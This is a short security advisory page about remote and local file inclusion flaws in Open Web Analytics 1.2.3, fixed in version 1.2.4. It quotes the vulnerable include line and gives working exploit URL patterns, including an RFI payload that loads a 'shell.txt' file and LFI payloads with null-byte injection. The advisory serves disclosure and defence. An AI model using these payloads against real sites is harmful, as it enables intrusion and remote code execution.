Open Web Analytics 1.2.3 multi file include

2010-03-28 / 2010-04-07
Credit: ItSecTeam
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22
CWE-94

=========================================================================== ( #Topic : Open Web Analytics 1.2.3 ( #Bug type : multi file include ( #Download : http://downloads.openwebanalytics.com/owa/owa_1_2_3.tar ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum : http://forum.ITSecTeam.com ( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm ( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members! vuls:=================================================================== path/mw_plugin.php require_once "$IP/includes/SpecialPage.php"; exploit:=================================================================== rfi : path/mw_plugin.php?IP=shell.txt? lfi :path/index.php?owa_action=[lfi]%00 lfi :path/index.php?owa_do=[lfi]%00 -------------------------------------- Successful exploitation requires that "magic_quotes_gpc" is disabled and "register_globals" is enabled. This exploit has been corrected in Open Web Analytics 1.2.4.

Referencje:

http://www.openwebanalytics.com/?p=87
http://xforce.iss.net/xforce/xfdb/57241
http://www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
http://www.exploit-db.com/exploits/11903
http://secunia.com/advisories/39153
http://packetstormsecurity.org/1003-exploits/owa123-lfirfi.txt
http://osvdb.org/63288


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top